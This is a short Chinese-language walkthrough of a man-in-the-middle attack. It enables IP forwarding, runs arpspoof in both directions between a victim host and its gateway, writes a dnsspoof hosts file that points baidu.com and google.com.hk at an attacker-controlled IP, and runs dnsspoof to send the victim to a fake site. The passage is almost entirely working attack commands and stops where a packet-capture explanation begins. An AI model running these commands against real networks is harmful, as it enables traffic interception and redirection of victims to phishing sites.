先进行arp欺骗,以中转攻击目标的所有上网流量 echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2
按照hosts文件格式,创建一个dnsspoof.hosts文件, 当受害者请求该文件中的域名解析时,我们就返回给他一个伪造的IP地址,让其访问我们伪造的网站。 cat dnsspoof.hosts
10.10.10.3 .baidu.com
10.10.10.3 .google.com.hk
执行dnsspoof, -f指定hosts文件,host 10.10.10.2 and udp port 53 遵从tcpdump流量过滤规则 dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53
这样当攻击目标10.10.10.2访问baidu.com或者google.com.hk时,受害者访问的实际上是10.10.10.3指定的网站。 通过抓包分析,dnsspoof的原理如下
|